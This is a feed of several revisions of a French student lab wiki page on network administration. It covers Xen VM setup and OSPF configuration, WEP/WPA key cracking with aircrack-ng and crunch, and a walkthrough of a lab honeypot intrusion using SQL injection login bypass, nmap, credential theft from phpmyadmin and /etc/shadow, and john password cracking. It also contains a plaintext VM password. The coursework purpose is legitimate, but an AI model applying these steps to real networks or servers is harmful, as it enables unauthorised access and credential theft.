  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
On peut alors lancer la VM et s'y connecter :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xen console stropharia&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54135</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54135"/>
				<updated>2020-11-30T16:29:39Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avec la commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
TODO&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
On peut alors lancer la VM et s'y connecter :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xen console stropharia&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54128</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54128"/>
				<updated>2020-11-30T16:25:19Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Configuration LVM */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avecla commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
TODO&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
On peut alors lancer la VM et s'y connecter :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xen console stropharia&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54117</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54117"/>
				<updated>2020-11-30T16:07:01Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Mise en place de la machine virtuelle Xen */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
==Creation de la VM==&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avecla commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
On peut alors lancer la VM et s'y connecter :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xen console stropharia&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                                  &lt;br /&gt;
 router-id 10.60.0.2                                  &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                                    &lt;br /&gt;
 summary-address 100.60.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                                  &lt;br /&gt;
 redistribute connected subnets                        &lt;br /&gt;
 redistribute static subnets route-map ospf                                                                                                                            &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
=Création de la VM=&lt;br /&gt;
&lt;br /&gt;
SSH sur capbreton&lt;br /&gt;
 xen-create-image&lt;br /&gt;
&lt;br /&gt;
=Configuration du dns sur Gandi=&lt;/div&gt;</summary>
		<author><name>Ccalleri</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54114</id>
		<title>TP sysres IMA5sc 2020/2021 G11</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G11&amp;diff=54114"/>
				<updated>2020-11-30T16:05:00Z</updated>
		
		<summary type="html">&lt;p&gt;Ccalleri : /* Mise en place de la machine virtuelle Xen */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Sébastien DARDENNE - Corto CALLERISA&lt;br /&gt;
&lt;br /&gt;
=Adressage=&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! IP (privée) !! IP (publique) !! VLAN !! IPV4 !! IPV4 6509-E !! IPV4 C9200 !! IPV4 Routeur !! IPV6&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11&lt;br /&gt;
| stropharia.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 100.64.0.18&lt;br /&gt;
| 193.48.57.178&lt;br /&gt;
| 311&lt;br /&gt;
| 10.60.111.0/24&lt;br /&gt;
| 10.60.111.1&lt;br /&gt;
| 10.60.111.2&lt;br /&gt;
| 10.60.111.254&lt;br /&gt;
| 2001:660:4401:60bd::0/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Mise en place de la machine virtuelle Xen=&lt;br /&gt;
&lt;br /&gt;
Après nous être connecté sur le serveur capbreton.plil.fr, nous créons la machine virtuelle du TP avecla commande :&lt;br /&gt;
 root@capbreton:~# xen-create-image --hostname=stropharia --password=pasglop --ip=100.64.0.18 --gateway=100.64.0.5 --netmask=255.255.255.0 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Cette commande spécifie les information de connexion à la VM ainsi que des informations réseau et la dernière version de Debian : Buster&lt;br /&gt;
&lt;br /&gt;
==Configuration LVM==&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
On peut alors lancer la VM et s'y connecter :&lt;br /&gt;
 xl create -c /etc/xen/stropharia.cfg&lt;br /&gt;
 xen console stropharia&lt;br /&gt;
&lt;br /&gt;
=5.1=&lt;br /&gt;
=5.2  Cassage de clef WEP d’un point d’accès WiFi=&lt;br /&gt;
&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On lance un scran des réseaux wifi'''&lt;br /&gt;
 airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
'''On capture les paquets'''&lt;br /&gt;
 airdump-ng --write crack11 --channel 3 --bssid 04:DA:D2:9C:50:5A wlan0mon&lt;br /&gt;
'''On lance le crack de la clé'''&lt;br /&gt;
 aircrack-ng -z crack11-01.cap&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [F1:DE:D4:00:00:00:00:0F:FF:FF:FF:FF:FF ]&lt;br /&gt;
=5.3=&lt;br /&gt;
'''Voir la liste des interfaces'''&lt;br /&gt;
 airmon-ng&lt;br /&gt;
'''On passe notre interface en mode monitor'''&lt;br /&gt;
 airmon-ng start wlx40a5efd2140c&lt;br /&gt;
'''On regarde les réseaux pour avoir le BSSID'''&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
'''On lance la commande capture sur le channel 5 et on attend le handshake'''&lt;br /&gt;
 airodump-ng --write donnees -c 5 --bssid 00:14:1B:60:8C:2A&lt;br /&gt;
'''Pendant ce temps-là, nous créons le dictionnaire pour le brutforce'''&lt;br /&gt;
 crunch 8 8 0123456789 &amp;gt; dictionnaire.txt&lt;br /&gt;
'''Pour gagner du temps, nous divisions ce dictionnaire en 4 parties'''&lt;br /&gt;
 split -l 25000000 dictionnaire.txt dictionnairediv.txt&lt;br /&gt;
&lt;br /&gt;
'''On lance le brutforce sur plusieurs machine en fonction'''&lt;br /&gt;
 aircrack-ng -a2 -b 00:14:1B:60:8C:2A -w dictionnairediv#.txt donnees-01.cap&lt;br /&gt;
&lt;br /&gt;
=5.4=&lt;br /&gt;
=5.5  Intrusion sur un serveur d’application Web=&lt;br /&gt;
&lt;br /&gt;
Sur site honey.plil.info, on exploite la faille avec une injection SQL dans l'id et le mdp:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
&lt;br /&gt;
On constate qu'il y a un service SSH et un serveur apache avec la commande suivante:&lt;br /&gt;
 nmap -T4 -A honey.plil.info&lt;br /&gt;
&lt;br /&gt;
Avec l'utilisation des manuels on extrait le fichier de configuration phpmyadmin afin d'avoir les identifiants pour se connecter honey.plil.fr/phpmyadmin. Il est important de se connecter en root avec le même mdp.&lt;br /&gt;
&lt;br /&gt;
Dans la BDD, on retrouve un compte d'un utilisateur ayant les droits sur la machine. On se connecte donc en SSH avec son compte et on extrait les fichier password et shadow.&lt;br /&gt;
&lt;br /&gt;
Nous allons donc utiliser john pour trouver le mdp root. De plus, nous créons notre dictionnaire avec crunch et sed en utilisant l'indice du sujet.&lt;br /&gt;
&lt;br /&gt;
Je lance donc la commande suivante:&lt;br /&gt;
 john --wordlist=dictionnaire password.txt unshadow.txt &amp;gt; output.txt&lt;br /&gt;
&lt;br /&gt;
Mdp trouvé et connexion en root(Groupe11):&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Honeygroupe11.png]]&lt;br /&gt;
&lt;br /&gt;
=Configuration OSPF sur 9200=&lt;br /&gt;
